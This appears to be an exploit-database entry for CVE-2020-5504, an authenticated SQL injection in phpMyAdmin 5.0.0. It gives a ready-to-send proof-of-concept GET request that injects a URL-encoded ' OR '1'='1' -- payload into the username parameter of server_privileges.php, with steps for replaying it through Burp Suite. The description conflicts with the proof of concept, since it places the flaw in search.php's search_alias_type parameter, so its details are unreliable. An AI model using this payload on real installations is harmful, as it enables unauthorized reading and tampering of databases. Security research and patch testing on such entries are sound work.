phpMyAdmin 5.0.0 SQL Injection

phpMyAdmin 5.0.0 was vulnerable to an authenticated SQL Injection (CVE-2020-5504).

The phpMyAdmin 5.0.0 was vulnerable to an authenticated SQL Injection (CVE-2020-5504).

The vulnerability resided in the `search.php` component, specifically within the `search_alias_type` parameter. An authenticated attacker, even with low privileges, could exploit this flaw. Improper sanitization of user-supplied input allowed attackers to inject malicious SQL queries.

This enabled attackers to extract sensitive database information, including user credentials, manipulate database content, and potentially achieve remote code execution (RCE) by writing arbitrary files to the server, depending on server configuration and permissions.

The vulnerability was patched in phpMyAdmin version 5.0.1. Users were strongly advised to upgrade immediately.

# Exploit Title: phpMyAdmin 5.0.0 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpmyadmin/phpmyadmin/
# Software Link: https://github.com/phpmyadmin/phpmyadmin/
# Version: 5.0.0
# Tested on: Windows
# CVE : CVE-2020-5504


Proof Of Concept
GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20--%20 HTTP/1.1
Host: phpmyadmin
Connection: close

# Additional conditions:
# - The attacker must have a valid MySQL account to access the server.


Steps to Reproduce
Log in phpmyadmin.
Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie.
Observe the result.